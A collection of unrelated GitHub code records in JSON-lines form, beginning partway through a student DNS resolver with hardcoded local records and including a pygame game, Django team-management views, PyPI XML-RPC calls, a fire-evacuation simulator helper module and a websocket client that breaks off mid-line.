(dns.AAAA, QTYPE.AAAA),\n 'MX': (dns.MX, QTYPE.MX),\n 'TXT': (dns.TXT, QTYPE.TXT)\n}\n\n# Clase que contiene un record de DNS, compatible con dnslib\n\n\nclass Record:\n def __init__(self, rname, rtype, args):\n self._rname = DNSLabel(rname)\n\n rd_cls, self._rtype = DNS_TYPES[rtype]\n\n self.rr = RR(\n rname=self._rname,\n rtype=self._rtype,\n rdata=rd_cls(*args),\n ttl=5,\n )\n\n def match(self, q):\n return q.qname == self._rname and (q.qtype == QTYPE.ANY or q.qtype == self._rtype)\n\n def __str__(self):\n return str(self.rr)\n\n\n# Records de DNS\nRECORDS = [\n Record('example.com', 'A', ('1.2.3.4',)),\n Record('test.com', 'A', ('4.3.3.4',)),\n Record('test.com', 'MX', ('Hola Mundo Test',)),\n\n Record('redesce.com', 'TXT', ('Hola Mundo Redes',)),\n Record('redesce.com', 'A', ('99.88.77.66',)),\n Record('redesce.com', 'AAAA', ('2001:0db8:85a3:0000:0000:8a2e:0370:7334',)),\n\n Record('tecdigital.tec.ac.cr', 'TXT', ('Record del TD hack',)),\n Record('tecdigital.tec.ac.cr', 'A', ('35.232.39.227',)),\n Record('tecdigital.tec.ac.cr', 'AAAA', ('2001:0db8:85a3:0000:0000:0000:0000:0000',)),\n]\n\n# Clase que resuelve consultas de DNS, compatible con dnslib\n\n\nclass Resolver(ProxyResolver):\n def __init__(self, upstream):\n super().__init__(upstream, 53, 5)\n self.records = RECORDS\n\n def resolve(self, request, handler):\n type_name = QTYPE[request.q.qtype]\n reply = request.reply()\n for record in self.records:\n if record.match(request.q):\n reply.add_answer(record.rr)\n\n if reply.rr:\n logger.info(\n 'encontrado record para %s[%s], %d entradas', request.q.qname, type_name, len(reply.rr))\n return reply\n\n logger.info(\n 'no se encontró localmente, buscando en DNS público %s[%s]', request.q.qname, type_name)\n return super().resolve(request, handler)\n\n\n# Maneja el SIGINT para terminar el programa\ndef handle_sig(signum, frame):\n logger.info('pid=%d, obtuvo señal %s, saliendo...',\n os.getpid(), signal.Signals(signum).name)\n exit(0)\n\n\n# Main\nif __name__ == '__main__':\n signal.signal(signal.SIGTERM, handle_sig)\n\n # Configuraciónd de dnslib\n port = int(os.getenv('PORT', 53))\n # Se utilizará este servidor como DNS público\n upstream = os.getenv('UPSTREAM', '8.8.8.8')\n resolver = Resolver(upstream)\n udp_server = DNSServer(resolver, port=port)\n tcp_server = DNSServer(resolver, port=port, tcp=True)\n\n logger.info(\n 'iniciando servidor DNS en el puerto %d, con servidor upstream \"%s\"', port, upstream)\n udp_server.start_thread()\n tcp_server.start_thread()\n\n try:\n while udp_server.isAlive():\n sleep(1)\n except KeyboardInterrupt:\n pass\n","repo_name":"gsegura96/desafio_redes","sub_path":"dnserver.py","file_name":"dnserver.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72208769794","text":"from orator.migrations import Migration\n\n\nclass CreateDetalleFacturaTable(Migration):\n\n def up(self):\n \"\"\"\n Run the migrations.\n \"\"\"\n with self.schema.create('detalle_factura') as table:\n table.increments('id')\n table.integer('factura_id', unsigned=True)\n table.integer('cantidad')\n table.decimal('sub_total',5,2)\n table.decimal('IGV',5,2)\n table.decimal('monto_total',5,2)\n table.timestamps()\n \n table.foreign('factura_id').references('id').on('factura')\n\n def down(self):\n \"\"\"\n Revert the migrations.\n \"\"\"\n self.schema.drop('detalle_factura')\n","repo_name":"BraulioBerlanga/WhatsApp-chatbot","sub_path":"migrations/2020_08_08_212108_create_Detalle_factura_table.py","file_name":"2020_08_08_212108_create_Detalle_factura_table.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33488153287","text":"# !/usr/bin/python\n# coding:utf-8\n## 上面两条注释可以解决 中文注释报错的问题 SyntaxError: Non-ASCII character\n\n\n\nimport pygame\n\nfrom settings import Settings\n\nfrom ship import Ship\n\nimport game_functions as gf\n\n# 一个函数\ndef run_game():\n # 初始化游戏并创建一个屏幕对象\n pygame.init()\n ai_settings = Settings()\n screen = pygame.display.set_mode((ai_settings.screen_width,ai_settings.screen_height))\n pygame.display.set_caption(\"Alien \")\n\n bg_color = (230, 230, 230)\n\n # 创建一艘飞船\n\n ship = Ship(screen)\n # 开始游戏的主循环\n while True:\n\n # 监视键盘和鼠标事件\n # for event in pygame.event.get():\n # if event.type == pygame.QUIT:\n # sys.exit()\n gf.check_event(ship)\n ship.update()\n # # 每次循环时都重绘屏幕\n # screen.fill(bg_color)\n #\n # ship.blitme()\n #\n # # 让最近绘制的屏幕可见\n # pygame.display.flip()\n gf.update_screen(ai_settings,screen,ship)\n\n# run_game()必须前面没有缩进,否则 pygame.display.flip()后面会报错,看来python虽然没有{},但是是靠 缩进来比对代码块。\nrun_game()\n","repo_name":"Seachal/LearnPy1","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26886750589","text":"# coding=utf-8\n\"\"\"\nNB: If you get the SSL error on mac, you may need to run:\n\n/Applications/Python 3.6/Install Certificates.command\n\nLots of docs:\nhttps://warehouse.readthedocs.io/api-reference/xml-rpc/\n\n\n# Journal of all things that have happened since point in time.\n#\n# import xmlrpc.client\n# >>> import arrow\n# >>> client = xmlrpc.client.ServerProxy('https://test.pypi.org/pypi')\n# >>> latefeb = arrow.get('2018-02-20 10:00:00')\n# >>> latefeb.timestamp\n# 1519120800\n# >>> latefebstamp = latefeb.timestamp\n# >>> recentchanges = client.changelog(latefebstamp)\n# >>> len(recentchanges)\n# 7322\n# >>> for entry in recentchanges:\n# ... if entry[0] == 'twine':\n# ... print(entry[1], \" \", entry[3], \" \", entry[2])\n#\n# \"\"\"\nimport pypi_xmlrpc\n\n\ndef list_packages() -> None:\n \"\"\"\n List all packages using xmlrpc\n :return:\n \"\"\"\n try:\n import xmlrpclib\n except ImportError:\n import xmlrpc.client as xmlrpclib\n\n client = xmlrpclib.ServerProxy(\"https://pypi.python.org/pypi\")\n # get a list of package names\n packages = client.list_packages()\n\n\nif __name__ == \"__main__\":\n\n def run() -> None:\n \"\"\"\n Exercise code\n :return:\n \"\"\"\n name = \"jiggle_version\"\n user = \"matthewdeanmartin\"\n version = \"1.0.68\"\n # x = pypi_xmlrpc.list_packages()\t# return list of all server packages\n # print(x)\n x = pypi_xmlrpc.package_releases(\n name, show_hidden=True\n ) # return list of package releases\n print(x)\n x = pypi_xmlrpc.package_roles(name) # return list of package roles\n print(x)\n x = pypi_xmlrpc.release_data(\n name, version\n ) # return dictionary with release data\n print(x)\n x = pypi_xmlrpc.release_urls(name, version) # return list of release urls\n print(x)\n x = pypi_xmlrpc.user_packages(user) # return list of user packages\n print(x)\n #\n\n run()\n","repo_name":"matthewdeanmartin/pypi_librarian","sub_path":"pypi_librarian/xml_rpc_endpoints.py","file_name":"xml_rpc_endpoints.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"23436446421","text":"def maximize(ln,lk):\n ken=0\n naomi=0\n for i in range(1,N+1):\n if lk[0]>ln[-1]:\n del(ln[0])\n del(lk[-1])\n ken+=1\n else:\n for j in range(0,N-i+2):\n if ln[j]>lk[0]:break\n del(ln[j])\n del(lk[0])\n naomi+=1\n return naomi\ndef war(ln,lk):\n ken=0\n naomi=0\n for i in range(1,N+1):\n if ln[-1]>lk[-1]:\n del(lk[0])\n naomi+=1\n else:\n for j in range(0,N-i+2):\n if lk[j]>ln[-1]:break\n del(lk[j])\n ken+=1\n del(ln[-1])\n return naomi\nT=int(input())\nfor i in range(1,T+1):\n N=int(input())\n tmp=input().split()\n map(int,tmp)\n ln=tmp\n tmp=input().split()\n map(int,tmp)\n lk=tmp\n ln.sort()\n lk.sort()\n (ln1,ln2,lk1,lk2)=(ln[:],ln[:],lk[:],lk[:])\n a=maximize(ln1,lk1)\n b=war(ln2,lk2)\n print(\"Case #\",i,\": \",a,\" \",b,sep=\"\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/902.py","file_name":"902.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27786905283","text":"\"\"\"\nlambda test program\n\"\"\"\nimport common_module\n\nclass LambdaTester:\n \"\"\"\n \"\"\"\n\n def lambda_test(self):\n \"\"\"\n \"\"\"\n common_module.print_function(self.lambda_test)\n\n add = lambda x,y: x+y\n result = add(5,3)\n print(result)\n\n numbers = [1,2,3,4,5]\n\n result = map(lambda x: x**2, numbers)\n print(list(result))\n\n # Convert list of strings to list of integers\n string_list = ['1','2','10','20']\n result = map(lambda x: int(x), string_list)\n list_result = list(result)\n print(list_result)\n\n # Alternative without using lambda:\n result2 = list(map(int, string_list))\n print(result2)\n\n # use list comprehension:\n new_list = [int(i) for i in string_list]\n print('new_list=', new_list)\n\n new_list2 = [i**2 for i in numbers]\n print('new_list2=', new_list2)\n\ndef main() -> None:\n\n me = LambdaTester()\n\n me.lambda_test()\n\n\nif __name__ == '__main__':\n main()","repo_name":"henryhjia/pythonproject","sub_path":"lamdba.py","file_name":"lamdba.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33602639553","text":"from rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom .models import SubTeam\nfrom .serializers import SubTeamSerialiser\nfrom ..users.models import User\nfrom ..users.serializers import PublicUserSerializer\n\nfrom django.db.models import Q\nimport json\n\n\n@api_view(['POST'])\ndef create_subteam(request):\n if (request.user.is_authenticated is False):\n return Response(\"User not authenticated\", status=401)\n else:\n if (request.user.team_admin is False):\n return Response(\"User is not authorised to create a subteam\", status=403)\n else:\n serialiser = SubTeamSerialiser(data=request.data)\n if serialiser.is_valid():\n serialiser.save()\n return Response(serialiser.data, status=200)\n else:\n return Response(serialiser.errors, status=400)\n\n\n@api_view(['GET'])\ndef get_subteams(request, team_id):\n # todo add in auth checks for this endpoint\n subteams = SubTeam.objects.filter(team_id=team_id)\n serializer = SubTeamSerialiser(subteams, many=True)\n return Response(serializer.data, status=200)\n\n\n@api_view(['PUT'])\ndef update_subteam(request, subteam_id):\n if (request.user.is_authenticated is False):\n return Response(\"User not authenticated\", status=401)\n else:\n # if (request.user.team_admin is False):\n # return Response(\"User is not authorised to update a subteam\", status=403)\n # else:\n subteam = SubTeam.objects.get(subteam_id=subteam_id)\n serializer = SubTeamSerialiser(instance=subteam, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n\n\n@api_view(['DELETE'])\ndef delete_subteam(request, subteam_id):\n if (request.user.is_authenticated is False):\n return Response(\"User not authenticated\", status=401)\n else:\n users = User.objects.filter(subteam_id=subteam_id)\n subteam = SubTeam.objects.get(subteam_id=subteam_id)\n for user in users:\n user.subteam_id = None\n user.save()\n subteam.delete()\n return Response(\"subteam deleted\", status=200)\n\n\n@api_view(['GET'])\ndef get_subteam_users(request, subteam_id):\n if request.user.is_authenticated is False:\n return Response(\"User not authenticated\", status=403)\n else:\n users = User.objects.filter(Q(subteam_id=subteam_id) & Q(team_id=request.user.team_id))\n serialiser = PublicUserSerializer(users, many=True)\n return Response(serialiser.data, status=200)\n\n\n@api_view(['GET'])\ndef get_available_users(request):\n if request.user.is_authenticated is False:\n return Response(\"User not authenticated\", status=403)\n else:\n users = User.objects.filter(Q(subteam_id=None) & Q(team_id=request.user.team_id))\n serialiser = PublicUserSerializer(users, many=True)\n return Response(serialiser.data, status=200)\n\n\n@api_view(['PUT'])\ndef edit_user_to_subteam(request, user_id):\n data = json.loads(request.body)\n subteam_id = data['subteam_id']\n subteam = SubTeam.objects.get(subteam_id=subteam_id)\n user = User.objects.get(id=user_id)\n user.subteam_id = subteam\n user.save()\n return Response(\"User added to subteam\", status=200)\n\n\n@api_view(['PUT'])\ndef delete_user_from_subteam(request, user_id):\n user = User.objects.get(id=user_id)\n user.subteam_id = None\n user.save()\n return Response(\"User removed from subteam\", status=200)\n","repo_name":"codersforcauses/csf","sub_path":"server/api/subteam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"70264393796","text":"import os\n\nSCRIPT_FILE_PATH = \"script.js\"\n\n\ndef render_to_js(query):\n \"\"\"\n\n :param query:\n :return:\n \"\"\"\n project_working_directory = os.getcwd()\n script_file = os.path.join(project_working_directory, SCRIPT_FILE_PATH)\n\n # Parse mongo query and add printjson() to the last query\n index = str(query).rindex('db.')\n query = query[:index] + 'printjson(' + query[index:] + ');'\n\n try:\n with open(script_file, mode='w') as scriptfile:\n scriptfile.writelines('rs.slaveOk();\\n')\n scriptfile.writelines(query)\n except Exception as e:\n print(str(e))\n","repo_name":"henryaboutshen/data-sanity","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44467011561","text":"from collections import OrderedDict\nfrom datetime import datetime\nfrom math import sqrt\nfrom numpy.random import randint\nfrom subprocess import Popen\nimport codecs\nimport inspect\nimport itertools\nimport json\nimport numpy as np\nimport os\nimport sqlite3\nimport sys\n\nclass SendMessage:# {{{\n ''' \n Useful for debuging gearman workers. In the past we had jabber here.\n '''\n\n def __init__(self,msg):\n with open(\"/tmp/aamks.log\", \"a\") as f: \n f.write(str(msg)+\"\\n\")\n# }}}\nclass Dump:# {{{\n def __init__(self,*args):\n '''debugging function, much like print but handles various types better'''\n print()\n for struct in args:\n if isinstance(struct, list):\n for i in struct:\n print(i)\n elif isinstance(struct, tuple):\n for i in struct:\n print(i)\n elif isinstance(struct, dict):\n for k, v in struct.items():\n print (str(k)+':', v)\n else:\n print(struct)\n# }}}\nclass Colors:# {{{\n def hex2rgb(self,color):\n rgb = color[1:]\n r, g, b = rgb[0:2], rgb[2:4], rgb[4:6]\n return tuple([float(int(v, 16)) / 255 for v in (r, g, b)])\n# }}}\nclass SimIterations:# {{{\n ''' \n For a given project we may run simulation 0 to 999. Then we may wish to run\n 100 simulations more and have them numbered here: from=1000 to=1099 These\n from and to numbers are unique for the project and are used as rand seeds\n in later aamks modules. Remember that range(1,4) returns 1,2,3; hence\n SELECT max(iteration)+1 \n '''\n\n def __init__(self, project, scenario_id, how_many):\n self.p=Psql()\n self.project=project\n self.scenario_id=scenario_id\n self.how_many=how_many\n\n def get(self):\n self.r=[]\n try:\n # If project already exists in simulations table (e.g. adding 100 simulations to existing 1000)\n _max=self.p.query(\"SELECT max(iteration)+1 FROM simulations WHERE project={} AND scenario_id={}\".format(self.project,self.scenario_id))[0][0]\n self.r.append(_max-self.how_many)\n self.r.append(_max)\n except:\n # If a new project\n self.r=[1, self.how_many+1]\n return self.r\n \n# }}}\nclass Sqlite: # {{{\n\n def __init__(self, handle, must_exist=0):\n '''\n must_exist=0: we are creating the database\n must_exist=1: Exception if there's no such file\n '''\n\n if must_exist == 1:\n assert os.path.exists(handle), \"Expected to find an existing sqlite file at: {}.\\nCWD: {}\".format(handle, os.getcwd())\n\n\n self.SQLITE = sqlite3.connect(handle)\n self.SQLITE.row_factory=self._sql_assoc\n self.sqlitedb=self.SQLITE.cursor()\n\n def _sql_assoc(self,cursor,row):\n ''' Query results returned as dicts. '''\n d = OrderedDict()\n for id, col in enumerate(cursor.description):\n d[col[0]] = row[id]\n return d\n\n def query(self,query,data=tuple()):\n ''' Query sqlite, return results as dict. '''\n self.sqlitedb.execute(query,data)\n self.SQLITE.commit()\n if query[:6] in(\"select\", \"SELECT\"):\n return self.sqlitedb.fetchall() \n\n def dict_insert(self, table, named_records):\n columns = ', '.join(named_records.keys())\n placeholders = ':'+', :'.join(named_records.keys())\n query='INSERT INTO {} ({}) VALUES ({})'.format(table, columns, placeholders)\n self.query(query, named_records)\n\n def executemany(self,query,data=tuple()):\n ''' Query sqlite, return results as dict. '''\n self.sqlitedb.executemany(query,data)\n self.SQLITE.commit()\n\n def querydd(self,query,data=tuple()):\n ''' Debug query, instead of connecting shows the exact query and params. '''\n print(query)\n print(data)\n\n def dump(self):\n print(\"dump() from caller: {}, {}\".format(inspect.stack()[1][1], inspect.stack()[1][3]))\n print(\"project: {}\".format(os.environ['AAMKS_PROJECT']))\n print()\n for i in self.query('SELECT * FROM aamks_geom order by floor,type_pri,global_type_id'):\n print(i)\n\n def dump_geoms(self,floor='all'):\n print(\"dump_geom() from caller: {}, {}\".format(inspect.stack()[1][1], inspect.stack()[1][3]))\n print(\"project: {}\".format(os.environ['AAMKS_PROJECT']))\n print()\n if floor=='all':\n print(\"f;name;x0;y0;x1;y1;z0;z1;pri;sec\")\n for i in self.query('SELECT floor,name,x0,y0,x1,y1,z0,z1,type_pri,type_sec FROM aamks_geom ORDER BY floor,type_pri,global_type_id'):\n print(\"{};{};{};{};{};{};{};{};{};{}\".format(i['floor'],i['name'],i['x0'], i['y0'], i['x1'], i['y1'], i['z0'], i['z1'], i['type_pri'], i['type_sec']))\n else:\n print(\"name;x0;y0;x1;y1;z0;z1\")\n for i in self.query('SELECT name,x0,y0,x1,y1,z0,z1 FROM aamks_geom WHERE floor=? ORDER BY type_pri,global_type_id', (floor,)):\n print(\"{};{};{};{};{};{};{}\".format(i['name'],i['x0'], i['y0'], i['x1'], i['y1'], i['z0'], i['z1']))\n\n def dumpall(self):\n ''' Remember to add all needed sqlite tables here '''\n print(\"dump() from caller: {}, {}\".format(inspect.stack()[1][1], inspect.stack()[1][3]))\n print(\"project: {}\".format(os.environ['AAMKS_PROJECT']))\n print()\n for i in ('aamks_geom', 'floors_meta', 'obstacles', 'partition', 'cell2compa', 'navmeshes'):\n try:\n print(\"\\n=======================\")\n print(\"table:\", i)\n print(\"=======================\\n\")\n z=self.query(\"SELECT * FROM {}\".format(i))\n try:\n z=json.loads(z[0]['json'], object_pairs_hook=OrderedDict)\n except:\n pass\n Dump(z)\n except:\n pass\n# }}}\nclass Psql: # {{{\n def __init__(self):\n\n import psycopg2\n import psycopg2.extras\n\n try:\n self._project_name=os.path.basename(os.environ['AAMKS_PROJECT'])\n except:\n pass\n\n try:\n self.PSQL=psycopg2.connect(\"dbname='aamks' user='aamks' host='127.0.0.1' password='{}'\".format(os.environ['AAMKS_PG_PASS']))\n self.psqldb=self.PSQL.cursor(cursor_factory=psycopg2.extras.DictCursor)\n except:\n raise SystemExit(\"Fatal: Cannot connect to postresql.\")\n\n def query(self,query,data=tuple()):\n ''' Query. Return results as dict. '''\n self.psqldb.execute(query,data)\n self.PSQL.commit()\n if query[:6] in(\"select\", \"SELECT\"):\n return self.psqldb.fetchall() \n\n def copy_expert(self, sql, csv_file):\n cursor = self.PSQL.cursor()\n with open(csv_file, \"w\") as f:\n cursor.copy_expert(sql, f)\n\n def querydd(self,query,data=tuple()):\n ''' Debug query. Instead of connecting shows the exact query and params. '''\n print(query)\n print(data)\n\n def dump(self):\n self.json=Json()\n self.conf=self.json.read(\"{}/conf.json\".format(os.environ['AAMKS_PROJECT']))\n print(\"dump() from caller: {}, {}\".format(inspect.stack()[1][1], inspect.stack()[1][3]))\n for i in self.query(\"SELECT id,project,iteration,to_char(current_timestamp, 'Mon.DD HH24:MI'),data FROM simulations WHERE project=%s ORDER BY id\", (self._project_name,) ):\n print(i)\n\n# }}}\nclass Json: # {{{\n def readdb(self,table):\n if not hasattr(self, 's'):\n self.s=Sqlite(\"{}/aamks.sqlite\".format(os.environ['AAMKS_PROJECT']))\n return json.loads(self.s.query(\"SELECT json FROM {}\".format(table))[0]['json'])\n def read(self,path): \n try:\n f=open(path, 'r')\n dump=json.load(f, object_pairs_hook=OrderedDict)\n f.close()\n return dump\n except:\n raise SystemExit(\"include.py: Missing or invalid json: {}.\".format(path)) \n\n def write(self, data, path, pretty=0): \n try:\n if pretty==1:\n pretty=json.dumps(data, indent=4)\n with open(path, \"w\") as f: \n json.dump(pretty, f)\n else:\n with open(path, \"w\") as f: \n json.dump(data, f)\n except:\n raise SystemExit(\"include.py: Cannot write json: {}.\".format(path)) \n\n\n# }}}\nclass GetUserPrefs:# {{{\n def __init__(self):# {{{\n self.p=Psql()\n if 'AAMKS_USER_ID' not in os.environ:\n os.environ[\"AAMKS_USER_ID\"]=str(1)\n\n self.pconf=json.loads(self.p.query(\"SELECT preferences FROM users WHERE id=%s\", (os.environ['AAMKS_USER_ID'],))[0][0])\n def get_var(self, var):\n return self.pconf[var]\n\n# }}}\n# }}}\nclass DDgeoms:# {{{\n '''\n dd_geoms are some optional extra rectangles, points, paths and\n circles that are written on top of our geoms. Useful for developing\n and debugging features. \n\n styles: 'fillColor', 'strokeColor', 'strokeWidth', 'opacity', 'fontSize', 'dashArray': [10,20] \n\n\n params:\n\n ddgeoms({\"type\": \"circle\" , \"g\": {\"p0\": (0, 0) , \"radius\": 10 }, \"floor\": \"0\" , \"style\": {\"fillColor\": \"#f00\" }})\n ddgeoms({\"type\": \"rectangle\", \"g\": {\"p0\": (0, 0) , \"size\": (100, 200) }, \"floor\": \"0\" , \"style\": {\"fillColor\": \"#f00\" }})\n ddgeoms({\"type\": \"text\" , \"g\": {\"p0\": (0, 0) , \"content\": \"Hello!\" }, \"floor\": \"0\" , \"style\": {\"fillColor\": \"#f00\" }})\n ddgeoms({\"type\": \"path\" , \"g\": {\"p0\": (0, 0) , \"points\": [(100, 200), (200,200)]}, \"floor\": \"0\" , \"style\": {\"fillColor\": \"#f00\" }})\n\n '''\n\n def open(self):# {{{\n self.json=Json()\n try:\n self.zz=self.json.read('{}/dd_geoms.json'.format(os.environ['AAMKS_PROJECT']))\n except:\n self.zz={}\n# }}}\n def add(self,params):# {{{\n floor=params['floor']\n tt=params['type']\n del params['floor']\n del params['type']\n if floor not in self.zz:\n self.zz[floor]={ 'rectangle': [], 'path': [], 'circle': [], 'text': [] }\n if \"p0\" in params['g']: params['g'][\"p0\"]=[ int(params['g']['p0'][0]), int(params['g']['p0'][1]) ]\n if \"p1\" in params['g']: params['g'][\"p1\"]=[ int(params['g']['p1'][0]), int(params['g']['p1'][1]) ]\n if \"points\" in params['g']: params['g'][\"points\"]=[ [int(i), int(j)] for i,j in params['g']['points'] ]\n params['g']=json.dumps(params['g'])\n self.zz[floor][tt].append(params)\n# }}}\n def write(self):# {{{\n self.json.write(self.zz, '{}/dd_geoms.json'.format(os.environ['AAMKS_PROJECT']))\n# }}}\n# }}}\nclass Vis:# {{{\n def __init__(self,params):# {{{\n ''' \n Static.json is written each time, because obstacles may be available /\n non-available, so it is not constans. \n '''\n\n self.s=Sqlite(\"{}/aamks.sqlite\".format(os.environ['AAMKS_PROJECT']))\n self.json=Json()\n self.conf=self.json.read(\"{}/conf.json\".format(os.environ['AAMKS_PROJECT']))\n self.params=params\n\n self._static_floors=OrderedDict()\n self._js_make_floors_and_meta()\n self._js_make_rooms()\n self._js_make_doors()\n self._js_make_obstacles()\n self._js_make_dd_geoms()\n self._js_make_srv_evacuees()\n self._js_vis_fire_origin()\n self._js_world_meta()\n self.json.write(OrderedDict([('world_meta', self._world_meta), ('floors', self._static_floors)]), '{}/workers/static.json'.format(os.environ['AAMKS_PROJECT'])) \n cae=CreateAnimEntry()\n cae.save(self.params, \"{}/workers/anims.json\".format(os.environ['AAMKS_PROJECT']))\n# }}}\n def _js_make_floors_and_meta(self):# {{{\n ''' Animation meta tells how to scale and translate canvas view '''\n \n for floor,meta in self.json.readdb(\"floors_meta\").items(): \n self._static_floors[floor]=OrderedDict()\n self._static_floors[floor]['floor_meta']=meta\n# }}}\n def _js_make_rooms(self):# {{{\n ''' Data for rooms. '''\n\n for floor in self._static_floors.keys():\n self._static_floors[floor]['rooms']=OrderedDict()\n for i in self.s.query(\"SELECT name,points,type_sec,room_enter FROM aamks_geom WHERE floor=? AND type_pri='COMPA'\", (floor,)):\n self._static_floors[floor]['rooms'][i['name']]=OrderedDict([ ('name', i['name']), ('type_sec', i['type_sec']), ('room_enter', i['room_enter']), ('points', i['points'])])\n# }}}\n def _js_make_doors(self):# {{{\n ''' Data for doors. '''\n\n for floor in self._static_floors.keys():\n self._static_floors[floor]['doors']=OrderedDict()\n for i in self.s.query(\"SELECT name,points,type_sec FROM aamks_geom WHERE floor=? AND type_tri='DOOR' AND type_sec != 'HOLE'\", (floor,)):\n self._static_floors[floor]['doors'][i['name']]=OrderedDict([ ('name', i['name']), ('type_sec', i['type_sec']), ('points', i['points'])])\n# }}}\n def _js_make_obstacles(self):# {{{\n ''' \n Data for obstacles. \n '''\n\n if \"skip_obstacles\" in self.params:\n xx={'obstacles': {} }\n dummy_obst=[[ [-1000, -1000, 0], [-1000, -1000, 0], [-1000, -1000, 0], [-1000, -1000, 0], [-1000, -1000, 0] ]]\n for floor in self._static_floors.keys():\n xx['obstacles'][floor]=dummy_obst\n else:\n xx=JSON.readdb(\"obstacles\")\n\n for floor,obstacles in xx['obstacles'].items():\n self._static_floors[floor]['obstacles']=[]\n for obstacle in obstacles:\n self._static_floors[floor]['obstacles'].append(json.dumps([ (o[0], o[1]) for o in obstacle ]))\n\n# }}}\n def _js_make_srv_evacuees(self):# {{{\n ''' Draw srv, non-animated evacuees '''\n\n if \"skip_evacuees\" in self.params:\n for floor,meta in self.json.readdb(\"floors_meta\").items(): \n self._static_floors[floor]['evacuees']=[]\n else:\n for floor,evacuees in JSON.readdb(\"dispatched_evacuees\").items():\n self._static_floors[floor]['evacuees']=[]\n for i in evacuees:\n self._static_floors[floor]['evacuees'].append(json.dumps(i))\n# }}}\n def _js_make_dd_geoms(self):# {{{\n try:\n f=self.json.read(\"{}/dd_geoms.json\".format(os.environ['AAMKS_PROJECT']))\n except:\n pass\n\n for floor in self._static_floors.keys():\n try:\n self._static_floors[floor]['dd_geoms']=f[floor]\n except:\n self._static_floors[floor]['dd_geoms']={ 'rectangle': [], 'path': [], 'circle': [], 'text': [] }\n# }}}\n def _js_vis_fire_origin(self):# {{{\n if \"skip_fire_origin\" in self.params:\n self.params['fire_origin']=None\n else:\n z=self.s.query(\"SELECT floor, x, y FROM fire_origin\")\n self.params['fire_origin']={'floor': z[0]['floor'], 'x': z[0]['x'], 'y': z[0]['y'] }\n# }}}\n def _js_world_meta(self):# {{{\n try:\n self._world_meta=JSON.readdb(\"world_meta\")['world2d']\n except:\n self._world_meta={ 'minx': 0, 'miny': 0, 'maxx': 3000, 'maxy': 2000, 'xdim': 3000, 'ydim': 2000, 'center': [1500, 100, 0] }\n# }}}\n# }}}\nclass CreateAnimEntry:# {{{\n ''' \n Animator renderer for static img | animation\n\n params for self.save()\n ======\n highlight_geom: geom to highlight in Animator\n anim: animation file | empty\n title: title\n srv: 0 | 1 (worker | server). 1 serves the purposes:\n * previous server visuals are obsolete and need to be removed\n * initial Apainter's evacuees will be displayed\n skip_evacuees: optional; good for cfast_partition.py calls before evacuees are ready\n skip_fire_origin: optional; good for cfast_partition.py calls before fire_origin is ready\n '''\n\n def _reorder_anims(self, z):# {{{\n '''\n sort_id -1, -2, -3 come from the server.\n sort_id > 1 come from workers -- sort_id is sim_id.\n We want to display latest from the server on top, then the workers.\n The server starts with -1 and next animations have -1 added.\n '''\n\n sorted_anims=[]\n d=[]\n for i,j in enumerate(z):\n d.append((j['sort_id'],i))\n sorted_d=sorted(d)\n for i in sorted_d:\n sorted_anims.append(z[i[1]])\n lowest_id=sorted_d[0][0]\n return (sorted_anims, lowest_id - 1)\n\n# }}}\n def save(self, params, path_anims_json):# {{{\n\n self.json=Json()\n\n try:\n z=self.json.read(path_anims_json)\n z,lowest_id=self._reorder_anims(z)\n except:\n z=[]\n lowest_id=-1\n\n anim_record=OrderedDict()\n anim_record['sort_id']=lowest_id\n #lowest_id-=1\n anim_record['title']=params['title']\n anim_record['time']=datetime.now().strftime('%H:%M')\n anim_record['fire_origin']=params['fire_origin']\n anim_record['highlight_geom']=params['highlight_geom']\n anim_record['srv']=params['srv']\n anim_record['anim']=params['anim']\n records={}\n records[anim_record['title']] = anim_record\n\n # We are removing duplicates here\n for i in z:\n # TODO: Jul.2019: perhaps this breaks worker animations. Consider r['srv'] == 1 ?\n if i['title'] not in records:\n records[i['title']]=i\n\n self.json.write(list(records.values()), path_anims_json)\n #dd(records)\n# }}}\n# }}}\n\ndd=Dump\nJSON=Json()\n","repo_name":"aamks/aamks","sub_path":"include.py","file_name":"include.py","file_ext":"py","file_size_in_byte":17650,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"} +{"seq_id":"13396435621","text":"from websocket import create_connection\nimport time\nimport json\nimport requests \ncarSizeSensores = '11100'\nmiSede = '1'\nws = create_connection(\"wss://iib2b26n9c.execute-api.us-east-1.amazonaws.com/test\")\nws.send('{\"action\":\"identificarme\"}')\nprint(\"Receiving connectionid\")\nresult = ws.recv()\nprint(\"Received connectionid \" + result)\nws.send('{\"action\":\"saveSedeConnection\",\"connectionId\":' + result + ',\"sedeId\":\"' + miSede + '\"}')\nobtained = ws.recv()\nprint(\"connectionId saved \" + obtained)\nwhile True:\n\tinstruccion = ws.recv()\n\tprint(\"instrucciones \" + instruccion)\n\tjsonData = json.loads(instruccion)\n\tjsonToSend = json.dumps({\n\t \"carSizeBin\": carSizeSensores,\n\t \"user\": jsonData[\"userId\"],\n\t \"paymentMethod\": jsonData[\"metodoPago\"],\n\t 